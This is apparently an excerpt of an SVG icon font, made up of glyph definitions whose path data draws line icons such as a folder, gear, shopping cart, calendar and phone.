<glyph unicode="&#xe650;" d="M299.616 419.624l-22.008-178.564h97.411l-162.635-212.684 22.009 178.563h-97.412l162.635 212.685zM324.24 479.9l-221.78-290.020h112.639l-27.339-221.78 221.78 290.020h-112.639l27.339 221.78z" />
<glyph unicode="&#xe651;" d="M499.105 236.786h-5.107c-6.322 52.847-51.238 93.83-105.783 93.83-50.68 0-93.014-35.386-103.851-82.776l-24.416 12.754c-2.465 1.282-5.431 1.282-7.896 0l-24.415-12.754c-10.837 47.399-53.171 82.785-103.851 82.785-54.554 0-99.453-40.984-105.784-93.83h-5.106c-7.065 0-12.795-5.731-12.795-12.804 0-7.055 5.73-12.786 12.795-12.786h5.106c6.331-52.846 51.23-93.83 105.784-93.83 58.885 0 106.625 47.731 106.625 106.625 0 1.982-0.192 3.924-0.3 5.881l25.889 13.528 25.889-13.528c-0.108-1.958-0.299-3.899-0.299-5.881 0-58.885 47.739-106.625 106.625-106.625 54.545 0 99.444 40.984 105.783 93.821h5.107c7.064 0 12.795 5.731 12.795 12.795s-5.731 12.795-12.795 12.795zM123.785 134.435c-49.39 0-89.565 40.176-89.565 89.565s40.175 89.565 89.565 89.565c49.389 0 89.565-40.175 89.565-89.565s-40.176-89.565-89.565-89.565zM388.215 134.435c-49.39 0-89.565 40.176-89.565 89.565 0 49.381 40.175 89.556 89.565 89.556s89.565-40.175 89.565-89.556c0-49.389-40.176-89.565-89.565-89.565z" />
<glyph unicode="&#xe652;" d="M360.7 326.368c14.22 12.512 23.25 30.788 23.25 51.164 0 37.627-30.613 68.24-68.24 68.24-25.673 0-48.064-14.27-59.71-35.278-11.645 21.009-34.037 35.278-59.71 35.278-37.627 0-68.24-30.613-68.24-68.24 0-20.376 9.030-38.652 23.249-51.164h-100.019v-324.14h409.44v324.14h-100.020zM443.66 309.308v-136.48h-179.13v136.48h10.896l41.409-72.472 14.811 8.463-36.578 64.008h148.592zM256 343.295l9.671-16.927h-19.343l9.672 16.927zM315.71 428.712c28.222 0 51.18-22.958 51.18-51.18 0-28.214-22.958-51.164-51.18-51.164s-51.18 22.95-51.18 51.164c0 28.222 22.957 51.18 51.18 51.18zM145.11 377.532c0 28.222 22.957 51.18 51.18 51.18 28.222 0 51.18-22.958 51.18-51.18 0-28.214-22.958-51.164-51.18-51.164-28.223 0-51.18 22.95-51.18 51.164zM216.932 309.308l-36.577-64.008 14.811-8.463 41.409 72.472h10.896v-136.48h-179.131v136.48h148.592zM68.34 155.768h179.13v-136.48h-179.13v136.48zM264.53 19.288v136.48h179.13v-136.48h-179.13z" />
<glyph unicode="&#xe653;" d="M426.6 356.215h-221.78v8.53c0 18.843-15.277 34.12-34.12 34.12h-85.3c-18.843 0-34.12-15.277-34.12-34.12v-281.49c0-18.842 15.277-34.12 34.12-34.12h341.2c18.843 0 34.12 15.278 34.12 34.12v238.84c0 18.843-15.277 34.12-34.12 34.12zM68.34 364.745c0 9.405 7.656 17.060 17.060 17.060h85.3c9.404 0 17.060-7.655 17.060-17.060v-25.59h238.84c9.404 0 17.060-7.655 17.060-17.060v-17.060h-375.32v59.71zM426.6 66.195h-341.2c-9.404 0-17.060 7.656-17.060 17.060v204.72h375.32v-204.72c0-9.404-7.656-17.060-17.060-17.060z" />
<glyph unicode="&#xe654;" d="M409.531 406.372l-11.346-3.956c-0.299-0.101-31.030-10.629-79.618-10.629-24.757 0-48.332 5.022-71.122 9.879-23.050 4.914-46.89 9.995-72.131 9.995-50.33 0-67.399-10.804-69.181-12.037l-3.674-2.54v-360.747h17.060v163.133c6.789 2.649 23.433 7.372 55.795 7.372 23.441 0 45.366-4.673 68.574-9.621 23.657-5.048 48.123-10.262 74.679-10.262 51.729 0 83.925 11.112 85.274 11.587l5.698 2.007-0.008 205.819zM392.48 212.948c-11.037-3.007-37.443-8.929-73.912-8.929-24.757 0-48.332 5.022-71.122 9.888-23.050 4.914-46.89 9.995-72.131 9.995-27.63 0-45.241-3.257-55.795-6.406v169.75c6.831 2.649 23.516 7.355 55.795 7.355 23.441 0 45.366-4.673 68.574-9.621 23.657-5.040 48.123-10.254 74.679-10.254 34.361 0 60.102 4.906 73.912 8.338v-170.116z" />
<glyph unicode="&#xe655;" d="M307.18 27.81h-102.452v166.361l-170.575 226.019h443.693l-170.666-226.019v-166.361zM221.788 44.87h68.332v155.015l153.473 203.245h-375.186l153.381-203.245v-155.015z" />
<glyph unicode="&#xe656;" d="M405.208 283.777l-144.943 144.943h-153.54v-409.44h298.55v264.471l-0.067 0.026zM260.265 404.595l112.356-112.355h-112.356v112.355zM123.785 36.34v375.32h119.42v-136.48h145.010v-238.84h-264.43z" />
<glyph unicode="&#xe657;" d="M179.23 411.66v17.060h-127.95v-127.95h17.060v98.829l121.411-121.411 12.062 12.061-121.411 121.411zM332.77 428.72v-17.060h98.828l-121.411-121.411 12.062-12.061 121.411 121.411v-98.829h17.060v127.95zM189.751 169.813l-121.411-121.411v98.828h-17.060v-127.95h127.95v17.060h-98.828l121.411 121.411zM443.66 48.402l-121.411 121.411-12.062-12.062 121.411-121.411h-98.828v-17.060h127.95v127.95h-17.060z" />
<glyph unicode="&#xe658;" d="M51.28 19.28h170.6v170.617h-170.6v-170.617zM68.34 172.837h136.48v-136.497h-136.48v136.497zM375.42 224h17.060v136.48h-136.48v-17.060h108.191l-126.076-126.075 12.062-12.062 125.243 125.242zM51.28 428.72v-204.72h17.060v187.66h375.32v-375.32h-187.66v-17.060h204.72v409.44z" />
<glyph unicode="&#xe659;" d="M452.19 386.078c0 23.558-19.1 42.642-42.65 42.642-23.557 0-42.65-19.084-42.65-42.642 0-20.625 14.653-37.835 34.12-41.792v-290.886h17.060v290.886c19.467 3.957 34.12 21.167 34.12 41.792zM409.54 360.488c-14.111 0-25.59 11.479-25.59 25.59 0 14.104 11.479 25.582 25.59 25.582s25.59-11.479 25.59-25.582c0-14.112-11.479-25.59-25.59-25.59zM110.99 103.722v290.878h-17.060v-290.878c-19.467-3.957-34.12-21.159-34.12-41.792 0-23.55 19.101-42.65 42.65-42.65 23.55 0 42.65 19.1 42.65 42.65 0 20.633-14.653 37.835-34.12 41.792zM102.46 36.34c-14.111 0-25.59 11.479-25.59 25.59s11.479 25.59 25.59 25.59 25.59-11.479 25.59-25.59-11.479-25.59-25.59-25.59zM264.53 265.792v128.808h-17.060v-128.808c-19.467-3.957-34.12-21.167-34.12-41.792s14.653-37.836 34.12-41.793v-128.807h17.060v128.807c19.467 3.957 34.12 21.167 34.12 41.793s-14.653 37.835-34.12 41.792zM256 198.41c-14.111 0-25.59 11.479-25.59 25.59s11.479 25.59 25.59 25.59 25.59-11.479 25.59-25.59-11.479-25.59-25.59-25.59z" />
<glyph unicode="&#xe65a;" d="M397.428 226.362c-0.341 1.324-1 2.524-1.883 3.524l-139.545 232.733-19.934-33.237h0.025l-120.403-200.772c-0.299-0.5-0.541-1.016-0.725-1.549-13.761-24.324-21.033-51.813-21.033-79.61 0-89.365 72.705-162.070 162.079-162.070 89.365 0 162.061 72.705 162.061 162.070 0 27.531-7.13 54.753-20.642 78.911zM256.009 2.441c-79.96 0-145.019 65.050-145.019 145.010 0 25.34 6.764 50.413 19.559 72.496 0.242 0.409 0.433 0.833 0.6 1.267l124.851 208.202 124.835-208.177c0.167-0.442 0.374-0.875 0.617-1.291 12.795-22.083 19.558-47.156 19.558-72.496 0-79.961-65.049-145.011-145.001-145.011z" />
<glyph unicode="&#xe65b;" d="M376.086 369.010h-239.506l-93.83-102.36v-187.66h426.5v187.66l-93.164 102.36zM144.086 351.95h224.462l77.637-85.3h-130.475c0-31.946-27.764-57.752-59.71-57.752s-59.71 25.807-59.71 57.752h-130.39l78.186 85.3zM452.19 96.050h-392.38v153.54h121.528c8.163-32.654 39.051-57.752 74.662-57.752s66.499 25.099 74.662 57.752h121.528v-153.54z" />
<glyph unicode="&#xe65c;" d="M181.362 266.966l-12.062-12.062 86.7-86.7 86.7 86.7-12.062 12.062-66.108-66.108v270.036h-17.060v-270.036zM298.65 385.594v-17.060h110.89v-290.020h-307.080v290.020h110.89v17.060h-127.95v-324.14h341.2v324.14z" />
<glyph unicode="&#xe65d;" d="M486.31 415.925h-460.62v-17.060h34.12v-307.080h187.66v-42.65h-136.48v-17.060h290.020v17.060h-136.48v42.65h187.66v307.080h34.12v17.060zM435.13 108.845h-358.26v290.020h358.26v-290.020zM230.41 347.685h-102.36v-102.36h102.36v102.36zM213.35 262.385h-68.24v68.24h68.24v-68.24zM264.53 262.385h119.42v-17.060h-119.42v17.060zM264.53 347.685h119.42v-17.060h-119.42v17.060zM264.53 305.035h119.42v-17.060h-119.42v17.060zM128.050 211.205h255.9v-17.060h-255.9v17.060zM128.050 160.025h255.9v-17.060h-255.9v17.060z" />
<glyph unicode="&#xe65e;" d="M477.78 116.825v307.080h-443.56v-307.080h213.25v-32.996l-80.901-44.807 8.263-14.927 81.168 44.966 81.169-44.966 8.263 14.927-80.902 44.807v32.996h213.25zM51.28 406.845h409.44v-272.96h-409.44v272.96zM244.705 233.171l-50.589 70.556-33.853-65.641-53.229 107.408-38.86-143.435 16.46-4.466 27.097 100.003 48.231-97.312 36.536 70.84 54.621-76.171 47.173 158.272-16.344 4.881zM375.429 321.545c-28.222 0-51.189-22.958-51.189-51.18s22.966-51.18 51.189-51.18c28.214 0 51.171 22.958 51.171 51.18s-22.958 51.18-51.171 51.18zM375.429 236.245c-18.818 0-34.129 15.302-34.129 34.12s15.311 34.12 34.129 34.12c18.81 0 34.111-15.302 34.111-34.12s-15.302-34.12-34.111-34.12z" />
<glyph unicode="&#xe65f;" d="M375.42 428.72h-324.14v-409.44h409.44v324.14l-85.3 85.3zM341.3 411.66v-119.42h-170.6v119.42h170.6zM443.66 36.34h-375.32v375.32h85.3v-136.48h204.72v136.48h9.996l75.304-75.304v-300.016zM290.454 377.54h17.060v-51.18h-17.060v51.18zM170.7 155.76h170.6v-17.060h-170.6v17.060zM170.7 104.58h170.6v-17.060h-170.6v17.060z" />
<glyph unicode="&#xe660;" d="M51.28 428.72v-409.44h409.44v409.44h-409.44zM443.66 411.66v-76.77h-375.32v76.77h375.32zM68.34 36.34v281.49h375.32v-281.49h-375.32zM179.222 386.070h25.598v-25.59h-25.598v25.59zM307.18 386.070h25.59v-25.59h-25.59v25.59zM197.564 257.136c-3.057-20.759-12.928-21.117-32.795-21.833l-3.082-0.117v-14.469h33.662v-94.622h17.859v133.774h-15.244l-0.4-2.733zM298.267 216.928c-7.93 0-16.077-2.591-22.533-6.931l6.073 31.279h56.237v16.953h-69.548l-13.57-72.447h15.435l0.942 1.474c5.398 8.405 15.235 13.628 25.69 13.628 17.018 0 29.372-12.587 29.372-29.922 0-15.677-9.839-31.554-28.639-31.554-16.069 0-27.622 10.845-28.097 26.381l-0.1 3.099h-17.843l0.075-3.274c0.574-25.274 18.676-42.25 45.049-42.25 26.59 0 47.415 20.35 47.415 46.324-0.001 28.255-18.468 47.24-45.958 47.24z" />
<glyph unicode="&#xe661;" d="M452.19 437.208c-0.624 0-1.199-0.15-1.816-0.183h-49.364v0.183l-339.384-0.183c-0.617 0.033-1.192 0.183-1.816 0.183-18.843 0-34.12-15.277-34.12-34.12 0-9.479 3.873-18.043 10.112-24.223l75.188-75.188v5.573c0-77.203 60.385-140.145 136.48-144.577v-136.821h-68.24v-17.060h153.54v17.060h-68.24v136.821c76.095 4.431 136.48 67.373 136.48 144.577v-5.573l75.187 75.188c6.24 6.181 10.113 14.744 10.113 24.223 0 18.843-15.277 34.12-34.12 34.12zM110.99 327.801l-63.183 63.184c-3.258 3.232-5.057 7.53-5.057 12.103 0 9.171 7.272 16.677 16.361 17.043 0.525-0.067 1.049-0.116 1.591-0.142l0.467-0.025h49.822v-92.163zM383.95 309.25c0-70.556-57.403-127.95-127.95-127.95s-127.95 57.394-127.95 127.95v110.898h255.9v-110.898zM464.193 390.985l-63.183-63.184v92.164l50.289 0.025c0.542 0.026 1.066 0.075 1.591 0.142 9.089-0.366 16.361-7.871 16.361-17.043-0.001-4.574-1.8-8.872-5.058-12.104z" />
<glyph unicode="&#xe662;" d="M431.923 287.267h68.123l-247.311 146.426-240.781-146.426h61.709v-255.9h-34.12v-17.060h426.5v17.060h-34.12v255.9zM72.847 304.327l180.004 109.474 184.903-109.474h-364.907zM90.723 31.367v255.9h51.18v-255.9h-51.18zM158.963 31.367v255.9h51.18v-255.9h-51.18zM227.203 31.367v255.9h51.18v-255.9h-51.18zM295.443 31.367v255.9h51.18v-255.9h-51.18zM363.683 31.367v255.9h51.18v-255.9h-51.18z" />
<glyph unicode="&#xe663;" d="M401.010 87.587v276.933l31.055 30.946-12.045 12.078-30.105-30.004h-278.824v51.18h-17.060v-51.18h-51.281v-17.060h51.281v-289.953h289.919v-51.247h17.060v51.247h68.24v17.060h-68.24zM372.805 360.48l-261.714-260.874v260.874h261.714zM123.203 87.587l260.747 259.922v-259.923h-260.747z" />
<glyph unicode="&#xe664;" d="M460.72 377.54h-409.44c-14.127 0-25.59-11.463-25.59-25.59v-255.9c0-14.144 11.463-25.59 25.59-25.59h409.44c14.128 0 25.59 11.446 25.59 25.59v255.9c0 14.127-11.462 25.59-25.59 25.59zM42.75 309.3h426.5v-34.12h-426.5v34.12zM469.25 96.050c0-4.707-3.823-8.53-8.53-8.53h-409.44c-4.706 0-8.53 3.823-8.53 8.53v162.070h426.5v-162.070zM42.75 326.36v25.59c0 4.706 3.824 8.53 8.53 8.53h409.44c4.707 0 8.53-3.824 8.53-8.53v-25.59h-426.5zM76.87 138.7h170.6v-17.060h-170.6v17.060zM76.87 189.88h102.36v-17.060h-102.36v17.060zM383.7 121.64h34.637c9.271 0 16.793 7.397 16.793 16.543v1.024c0 9.138-7.522 16.552-16.793 16.552h-34.637c-9.287 0-16.81-7.414-16.81-16.552v-1.024c0-9.146 7.523-16.543 16.81-16.543z" />
<glyph unicode="&#xe665;" d="M445.523 361.835l-86.147 86.147h-189.523v-68.918h-103.376v-379.047h275.67v68.918h103.376v292.9zM359.376 423.618l61.784-61.783h-61.784v61.783zM83.706 17.247v344.588h155.065v-86.147h86.147v-258.441h-241.212zM256 354.7l61.784-61.783h-61.784v61.783zM342.147 86.165v206.753l-86.147 86.147h-68.918v51.688h155.065v-86.147h86.147v-258.441h-86.147z" />
<glyph unicode="&#xe666;" d="M281.59 420.19v-41.576l12.795-3.307c14.478-3.74 28.289-9.554 41.051-17.301l11.446-6.947 29.755 29.754 36.186-36.185-30.213-30.205 6.506-11.329c7.214-12.561 12.612-26.165 16.027-40.425l3.14-13.078h43.909v-51.18h-44.891l-3.457-12.52c-3.732-13.503-9.329-26.457-16.643-38.502l-6.948-11.454 32.571-32.562-36.186-36.185-33.029 33.021-11.32-6.506c-11.746-6.756-24.499-11.921-37.894-15.378l-12.804-3.299v-47.215h-51.18v47.215l-12.804 3.299c-13.395 3.457-26.148 8.622-37.894 15.378l-11.329 6.506-33.020-33.029-36.186 36.194 32.571 32.562-6.948 11.454c-7.314 12.045-12.911 24.999-16.643 38.502l-3.457 12.52h-44.891v51.18h43.909l3.14 13.078c3.415 14.26 8.813 27.864 16.027 40.425l6.506 11.329-30.213 30.205 36.186 36.185 29.755-29.754 11.446 6.947c12.762 7.747 26.573 13.562 41.051 17.301l12.795 3.307v41.575h51.178zM256 147.213c42.334 0 76.77 34.445 76.77 76.787 0 42.333-34.436 76.778-76.77 76.778s-76.77-34.445-76.77-76.778c0-42.342 34.436-76.787 76.77-76.787zM298.65 437.25h-85.3v-45.424c-16.294-4.207-31.605-10.721-45.632-19.234l-32.354 32.353-60.31-60.317 33.038-33.038c-7.972-13.877-13.995-28.964-17.827-44.94h-47.515v-85.3h48.964c4.216-15.253 10.479-29.597 18.502-42.817l-35.162-35.161 60.31-60.326 35.852 35.861c13.062-7.506 27.198-13.253 42.134-17.102v-51.055h85.3v51.055c14.936 3.849 29.072 9.596 42.134 17.102l35.853-35.852 60.31 60.317-35.162 35.161c8.022 13.22 14.286 27.565 18.502 42.817h48.964v85.3h-47.515c-3.832 15.977-9.855 31.063-17.827 44.94l33.038 33.038-60.31 60.317-32.354-32.353c-14.028 8.513-29.338 15.027-45.632 19.234v45.424h-0.001zM256 164.273c-32.987 0-59.71 26.74-59.71 59.727 0 32.986 26.723 59.718 59.71 59.718s59.71-26.731 59.71-59.718c0-32.987-26.723-59.727-59.71-59.727v0z" />
<glyph unicode="&#xe667;" d="M287.871 392.118c6.631 7.513 10.779 17.277 10.779 28.081 0 23.549-19.084 42.641-42.65 42.641-23.557 0-42.65-19.093-42.65-42.641 0-10.804 4.148-20.568 10.779-28.081-97.92-15.311-172.849-100.011-172.849-202.238 0-113.073 91.664-204.72 204.72-204.72s204.72 91.647 204.72 204.72c0 102.218-74.929 186.927-172.849 202.238zM256 445.78c14.111 0 25.59-11.479 25.59-25.581s-11.479-25.582-25.59-25.582-25.59 11.479-25.59 25.581 11.479 25.582 25.59 25.582zM256 2.22c-103.477 0-187.66 84.183-187.66 187.66s84.183 187.66 187.66 187.66 187.66-84.183 187.66-187.66-84.183-187.66-187.66-187.66zM153.682 87.387l138.804 65.741 65.75 138.812-139.263-65.299-65.291-139.254zM227.953 205.599l43.542-43.541-82.21-38.935 38.668 82.476zM283.556 174.119l-43.541 43.541 82.484 38.677-38.943-82.218z" />
<glyph unicode="&#xe668;" d="M426.625 402.876h-341.25c-18.843 0-34.12-15.277-34.12-34.12v-221.896c0-18.843 15.277-34.12 34.12-34.12h239.49l67.615-67.616v67.616h34.146c18.842 0 34.12 15.277 34.12 34.12v221.896c-0.001 18.843-15.279 34.12-34.121 34.12zM443.685 146.86c0-9.405-7.656-17.060-17.060-17.060h-51.205v-43.492l-43.491 43.492h-246.554c-9.404 0-17.060 7.655-17.060 17.060v221.896c0 9.405 7.656 17.060 17.060 17.060h341.25c9.404 0 17.060-7.655 17.060-17.060v-221.896zM256 274.81c-9.421 0-17.060-7.647-17.060-17.060 0-9.421 7.639-17.060 17.060-17.060s17.060 7.639 17.060 17.060c0 9.413-7.639 17.060-17.060 17.060zM324.24 274.81c-9.421 0-17.060-7.647-17.060-17.060 0-9.421 7.639-17.060 17.060-17.060s17.060 7.639 17.060 17.060c0 9.413-7.639 17.060-17.060 17.060zM189.367 274.81c-9.421 0-17.060-7.647-17.060-17.060 0-9.421 7.639-17.060 17.060-17.060s17.060 7.639 17.060 17.060c0 9.413-7.638 17.060-17.060 17.060z" />
<glyph unicode="&#xe669;" d="M383.517 164.29h68.673v136.48h-392.38v-127.95c0-89.507 72.563-162.070 162.070-162.070 86.625 0 157.181 68.023 161.637 153.54zM383.95 283.71h51.18v-102.36h-51.18v102.36zM221.88 27.81c-79.96 0-145.010 65.049-145.010 145.010v110.89h290.020v-110.89c0-79.961-65.050-145.010-145.010-145.010zM59.81-6.31h324.14v17.060h-324.14zM145.11 428.72h17.060v-76.77h-17.060v76.77zM281.59 428.72h17.060v-76.77h-17.060v76.77zM213.35 454.31h17.060v-102.36h-17.060v102.36z" />
<glyph unicode="&#xe66a;" d="M286.301 368.885c63.5 0 115.155-51.647 115.155-115.155 0-0.35-0.042-0.717-0.067-1.066-0.049-0.85-0.108-1.699-0.125-2.566l-0.433-17.41 17.435-0.067c42.2-0.117 76.528-34.553 76.528-76.754 0-42.084-34.262-76.52-76.37-76.737l-3.723-0.016h-312.27c-46.99 0.049-85.225 38.301-85.225 85.283 0 36.403 23.174 68.806 57.653 80.636l9.596 3.281 1.691 9.996c4.181 24.674 25.373 42.583 50.388 42.583 7.972 0 15.677-1.849 22.9-5.481l15.553-7.813 7.505 15.693c19.067 39.853 59.817 65.593 103.809 65.593zM286.301 385.945c-52.613 0-97.912-30.804-119.196-75.287-9.205 4.632-19.567 7.297-30.572 7.297-33.769 0-61.742-24.574-67.207-56.794-40.216-13.795-69.18-51.847-69.18-96.763 0-56.494 45.79-102.293 102.268-102.343l316.102 0.016c51.596 0.267 93.338 42.15 93.338 93.797 0 51.73-41.841 93.664-93.538 93.814 0.033 1.366 0.2 2.682 0.2 4.048 0 73.021-59.194 132.215-132.215 132.215v0z" />
<glyph unicode="&#xe66b;" d="M256 428.72c-113.056 0-204.72-91.664-204.72-204.72 0-113.057 91.664-204.72 204.72-204.72s204.72 91.663 204.72 204.72c0 113.056-91.664 204.72-204.72 204.72zM256 36.34c-103.477 0-187.66 84.183-187.66 187.66 0 103.476 84.183 187.66 187.66 187.66s187.66-84.184 187.66-187.66c0-103.477-84.183-187.66-187.66-187.66zM256 206.94h-102.36v-17.060h119.42v169.9h-17.060z" />
<glyph unicode="&#xe66c;" d="M256 437.25c-117.77 0-213.25-95.471-213.25-213.25s95.48-213.25 213.25-213.25c117.771 0 213.25 95.471 213.25 213.25s-95.479 213.25-213.25 213.25zM256 27.81c-108.183 0-196.19 88.015-196.19 196.19 0 108.174 88.007 196.19 196.19 196.19s196.19-88.016 196.19-196.19c0-108.175-88.007-196.19-196.19-196.19zM362.675 300.137l-136.938-132.79-47.973 47.964c-4.999 4.999-13.095 4.999-18.093 0-4.999-4.998-4.999-13.094 0-18.093l56.877-56.877c2.499-2.499 5.773-3.749 9.047-3.749 3.207 0 6.422 1.199 8.904 3.607l145.985 141.561c5.073 4.923 5.198 13.019 0.283 18.093-4.938 5.082-13.027 5.198-18.092 0.284z" />
<glyph unicode="&#xe66d;" d="M341.3 309.296v127.95h-298.55v-230.31h127.95v-127.95h177.015l68.24-68.231h10.645v68.231h42.65v230.31h-127.95zM59.81 223.996v196.19h264.43v-110.89h-153.54v-85.3h-110.89zM452.19 96.046h-42.65v-54.754l-54.762 54.754h-167.018v196.19h264.43v-196.19z" />
<glyph unicode="&#xe66e;" d="M489.946 326.36h-358.519l-28.946 119.42h-80.427v-17.060h67.015l83.176-343.091c-17.735-5.165-30.771-21.351-30.771-40.759 0-23.55 19.092-42.65 42.65-42.65 23.557 0 42.65 19.1 42.65 42.65 0 9.646-3.324 18.45-8.722 25.59h119.794c-5.398-7.14-8.713-15.944-8.713-25.59 0-23.55 19.084-42.65 42.641-42.65 23.566 0 42.659 19.1 42.659 42.65 0 23.565-19.093 42.641-42.65 42.65v0h-182.453l-8.272 34.12h239.489l69.399 204.72zM209.714 44.87c0-14.111-11.48-25.59-25.59-25.59s-25.59 11.479-25.59 25.59c0 14.11 11.479 25.59 25.59 25.59 14.11 0 25.59-11.48 25.59-25.59zM397.374 44.87c0-14.111-11.48-25.59-25.599-25.59-14.103 0-25.581 11.479-25.581 25.59s11.479 25.59 25.581 25.59c14.119 0 25.599-11.48 25.599-25.59zM176.926 138.7l-41.359 170.6h330.587l-57.834-170.6h-231.394z" />
<glyph unicode="&#xe66f;" d="M435.126 334.89h-70.556l-41.017 41.117c-0.049 0.049-0.091 0.083-0.133 0.133l-0.075 0.067c-6.164 6.097-14.627 9.863-23.982 9.863h-85.3c-9.913 0-18.751-4.282-24.99-11.029l-0.033 0.1-40.168-40.251h-72.006c-18.843 0-34.12-15.278-34.12-34.12v-204.72c0-18.843 15.277-34.12 34.12-34.12h358.26c18.851 0 34.129 15.277 34.129 34.12v204.72c-0.001 18.842-15.278 34.12-34.129 34.12zM452.194 96.050c0-9.397-7.664-17.060-17.069-17.060h-358.259c-9.404 0-17.060 7.663-17.060 17.060v204.72c0 9.413 7.656 17.060 17.060 17.060h79.077l25.656 25.706 0.417-1.25 19.584 21.176c3.315 3.582 7.738 5.548 12.461 5.548h85.3c4.506 0 8.771-1.75 12.112-5.048l46.015-46.132h77.637c9.404 0 17.069-7.647 17.069-17.060v-204.72zM255.996 317.83c-61.243 0-110.89-49.631-110.89-110.874s49.647-110.906 110.89-110.906 110.89 49.663 110.89 110.906-49.647 110.874-110.89 110.874zM255.996 113.11c-51.738 0-93.83 42.1-93.83 93.846 0 51.73 42.092 93.814 93.83 93.814s93.83-42.084 93.83-93.814c0-51.746-42.092-93.846-93.83-93.846zM255.996 283.71c-42.409 0-76.77-34.354-76.77-76.754s34.361-76.786 76.77-76.786 76.77 34.386 76.77 76.786-34.362 76.754-76.77 76.754zM255.996 147.23c-32.921 0-59.71 26.806-59.71 59.726s26.789 59.694 59.71 59.694 59.71-26.773 59.71-59.694-26.79-59.726-59.71-59.726z" />
<glyph unicode="&#xe670;" d="M374.511-6.31c-38.902 0-133.448 49.748-212.85 156.523-74.263 99.869-110.365 172.016-110.365 220.564 0 38.226 26.398 56.469 40.576 66.265l3.499 2.441c15.669 11.203 40.034 14.827 49.372 14.827 16.377 0 23.283-9.588 27.464-17.943 3.548-7.064 32.97-70.247 35.952-78.102 4.574-12.078 3.066-29.68-11.079-39.801l-2.482-1.733c-7.023-4.865-20.084-13.911-21.891-24.907-0.883-5.347 0.908-10.937 5.473-17.093 22.774-30.688 95.488-120.794 108.599-133.031 10.271-9.596 23.283-10.962 32.146-3.49 9.171 7.731 13.245 12.295 13.286 12.345l0.941 0.908c0.775 0.65 7.939 6.331 19.651 6.331 8.446 0 17.043-2.916 25.531-8.655 22.050-14.894 71.797-48.173 71.797-48.173l0.808-0.608c6.364-5.456 15.561-21.166 4.84-41.617-11.112-21.226-45.607-65.051-81.268-65.051zM144.743 437.25c-8.080 0-27.939-3.415-39.46-11.645l-3.707-2.591c-13.228-9.147-33.22-22.958-33.22-52.238 0-44.749 35.003-113.564 106.999-210.385 78.628-105.75 168.509-149.642 199.156-149.642 26.064 0 55.945 36.411 66.157 55.904 6.273 11.97 1.141 18.717-0.633 20.542-5.756 3.856-50.621 33.87-71.247 47.806-5.623 3.806-11.005 5.73-15.985 5.73-4.523 0-7.497-1.607-8.505-2.241-1.666-1.783-6.247-6.473-14.378-13.328-15.218-12.811-38.368-11.271-54.786 4.065-14.77 13.786-89.365 106.658-110.649 135.339-7.364 9.921-10.262 20.026-8.614 30.030 2.991 18.135 19.918 29.855 29.014 36.153l2.266 1.591c8.122 5.806 6.406 16.319 5.057 19.876-2.516 6.623-31.563 69.156-35.244 76.503-3.016 6.016-5.382 8.531-12.221 8.531z" />
<glyph unicode="&#xe671;" d="M136.58 317.83h238.84v68.24h-238.84v-68.24zM153.64 369.010h204.72v-34.12h-204.72v34.12zM375.42 428.72h-238.84c-18.843 0-34.12-15.277-34.12-34.12v-341.2c0-18.843 15.277-34.12 34.12-34.12h238.84c18.843 0 34.12 15.277 34.12 34.12v341.2c0 18.843-15.277 34.12-34.12 34.12zM392.48 53.4c0-9.413-7.655-17.060-17.060-17.060h-238.84c-9.404 0-17.060 7.647-17.060 17.060v341.2c0 9.397 7.656 17.060 17.060 17.060h238.84c9.405 0 17.060-7.663 17.060-17.060v-341.2zM153.64 241.060v51.18h-17.060v-68.24h68.24v17.060h-17.060zM153.64 155.76v51.18h-17.060v-68.24h68.24v17.060h-17.060zM153.64 70.46v51.18h-17.060v-68.24h68.24v17.060h-17.060zM238.94 241.060v51.18h-17.060v-68.24h68.24v17.060h-17.060zM324.24 241.060v51.18h-17.060v-68.24h68.24v17.060h-17.060zM238.94 155.76v51.18h-17.060v-68.24h68.24v17.060h-17.060zM238.94 70.46v51.18h-17.060v-68.24h68.24v17.060h-17.060zM324.24 70.46v136.48h-17.060v-153.54h68.24v17.060h-17.060z" />
<glyph unicode="&#xe672;" d="M42.746 437.25v-426.5h426.508v426.5h-426.508zM452.194 420.19v-68.24h-392.388v68.24h392.388zM59.806 27.81v307.080h392.388v-307.080h-392.388zM153.636 394.6h264.438v-17.060h-264.438v17.060zM85.396 394.6h17.060v-17.060h-17.060v17.060zM119.516 394.6h17.060v-17.060h-17.060v17.060z" />
<glyph unicode="&#xe673;" d="M477.93 383.592l-221.93 81.593-230.31-84.533v-314.278l230.31-83.559 230.31 83.559v314.144l-8.38 3.074zM247.47 4.065l-204.72 74.272v283.947l204.72-74.272v-283.947zM256 303.074l-197.222 71.554 197.222 72.381 197.040-72.447-197.040-71.488zM469.25 78.337l-204.72-74.272v283.948l204.72 73.971v-283.647z" />
<glyph unicode="&#xe674;" d="M460.72 415.925h-409.44v-110.89h17.069v-272.96h375.311v272.96h17.060v110.89zM426.6 49.135h-341.191v255.9h341.191v-255.9zM443.66 322.095h-375.32v76.77h375.32v-76.77zM194.299 194.071h123.818c17.627 0 31.93 13.886 31.93 31.030v6.181c0 17.143-14.303 31.030-31.93 31.030h-123.818c-17.635 0-31.913-13.887-31.913-31.030v-6.181c0.001-17.144 14.278-31.030 31.913-31.030zM179.447 231.281c0 7.705 6.664 13.97 14.853 13.97h123.818c8.197 0 14.87-6.264 14.87-13.97v-6.181c0-7.706-6.672-13.97-14.87-13.97h-123.819c-8.189 0-14.853 6.264-14.853 13.97v6.181z" />
<glyph unicode="&#xe675;" d="M435.155 420.248h-153.54c-10.262 0-19.359-4.623-25.606-11.804-6.264 7.181-15.361 11.804-25.623 11.804h-153.541c-18.843 0-34.12-15.277-34.12-34.12v-290.137c0-18.843 15.277-34.12 34.12-34.12h153.54c0.166 0 0.333 0.050 0.5 0.050 9.079-0.217 16.393-7.539 16.61-16.602v-17.568h17.060v9.463h0.167v7.689c0 9.221 7.363 16.718 16.527 17.010 0.116 0 0.25-0.042 0.366-0.042h153.54c18.843 0 34.12 15.277 34.12 34.12v290.137c0 18.843-15.278 34.12-34.12 34.12zM59.785 95.992v290.136c0 9.404 7.663 17.060 17.060 17.060h153.54c9.413 0 17.060-7.656 17.060-17.060v-290.137c0-9.404-7.647-17.060-17.060-17.060h-153.54c-9.396 0.001-17.060 7.656-17.060 17.061zM452.215 95.992c0-9.404-7.647-17.060-17.060-17.060h-153.54c-9.396 0-17.060 7.656-17.060 17.060v290.136c0 9.404 7.664 17.060 17.060 17.060h153.54c9.413 0 17.060-7.656 17.060-17.060v-290.136z" />
